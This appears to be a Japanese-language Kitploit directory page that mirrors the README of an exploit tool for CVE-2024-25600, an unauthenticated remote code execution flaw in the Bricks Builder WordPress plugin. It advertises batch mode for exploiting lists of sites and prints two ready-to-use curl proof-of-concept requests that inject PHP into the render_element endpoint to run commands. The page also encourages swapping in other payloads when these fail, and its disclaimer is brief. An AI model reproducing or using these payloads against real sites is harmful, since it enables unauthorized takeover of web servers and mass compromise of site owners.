Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-25600-Bricks-Builder-WordPress — CVE-2024-25600 の自動化エクスプロイトツール。Bricks Builder プラグインを使用する WordPress サイトで、認証不要のリモートコード実行を可能にします。コマンド実行のためのインタラクティブモードとバッチモードをサポートしています。 | Kitploit
ツール/GitHubGitHub/kasoomi0228/cve-2024-25600-bricks-builder-wordpress
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストコマンド&コントロール
GitHubkasoomi0228/cve-2024-25600-bricks-builder-wordpress

CVE-2024-25600-Bricks-Builder-WordPress

CVE-2024-25600 の自動化エクスプロイトツール。Bricks Builder プラグインを使用する WordPress サイトで、認証不要のリモートコード実行を可能にします。コマンド実行のためのインタラクティブモードとバッチモードをサポートしています。

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
2年前未レビュー

CVE-2024-25600 エクスプロイトツール 🚀

説明 📝

このツール 🛠️ は、WordPress 用 Bricks Builder プラグインで見つかった CVE-2024-25600 の脆弱性 🕳️ を悪用するために設計されています。この脆弱性により、影響を受けるウェブサイト 💻 上で認証なしのリモートコード実行が可能になります。このツールは、nonce を取得し、特別に細工されたリクエストを送信して任意のコマンドを実行することで、エクスプロイトプロセスを自動化します。

特徴 🌟

  • インタラクティブモード: ターゲットウェブサイトとリアルタイムで対話 🕹️。
  • バッチモード: リストから複数のウェブサイトをスキャンしてエクスプロイト 📋。
  • コマンド実行: ターゲットサーバー上で任意のコマンドを実行 ⚙️。

インストール 🛠️

  1. このリポジトリを git clone でローカルマシン 🖥️ にクローンします。
  2. クローンしたリポジトリのディレクトリに移動します。
  3. pip install -r requirements.txt を使用して、必要な Python ライブラリをインストールします。

使い方 📖

インタラクティブモード 🎮

  1. python exploit.py -u <URL> でツールを実行し、インタラクティブモードを開始します。
  2. 画面の指示に従って、ターゲットサーバーにコマンドを送信します。

バッチモード 📊

  1. ターゲット URL のリストを含むテキストファイルを用意します。
  2. python exploit.py -l <ファイルパス> でツールを実行し、リストされたサイトをスキャンしてエクスプロイトします。

概念実証 (PoC) 📝

開示によって提供された基本 PoC は以下の通りです。

root@kitploit:~
curl -k -X POST https://[HOST]/wp-json/bricks/v1/render_element \
-H "Content-Type: application/json" \
-d '{
  "postId": "1",
  "nonce": "[NONCE]",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "throw new Exception(`id`);",
        "objectType": "post"
      }
    }
  }
}'

更新: 2 つ目の PoC (より信頼性が高い)

root@kitploit:~
curl -k -X POST https://[HOST]/wp-json/bricks/v1/render_element \
  -H "Content-Type: application/json" \
  -d '{
  "postId": "1",
  "nonce": "[NONCE]",
  "element": {
    "name": "carousel",
    "settings": {
      "type": "posts",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "throw new Exception(`id`);",
        "objectType": "post"
      }
    }
  }
}'

追加のペイロードによっては、より良い結果が得られる可能性があります。私のエクスプロイトまたは概念実証が機能しない場合は、別のペイロードを試して、より効果的な解決策を見つけることをお勧めします。

[HOST] はターゲットウェブサイトに、[NONCE] はサイトから取得した nonce の値に置き換えてください。

参照 📖

CVE-2024-25600 脆弱性の詳細については、Snicco.io の詳細な開示を参照してください。

免責事項 ⚠️

この README で提供される情報は教育目的のみです。許可なくウェブサイトやネットワークにハッキングすることは違法であり、非倫理的です。🚫

謝辞 🙏

この脆弱性を発見し報告し、コミュニティにウェブアプリケーションのセキュリティ保護に役立つ情報とツールを提供してくれたセキュリティ研究者に感謝します。

ツールをダウンロード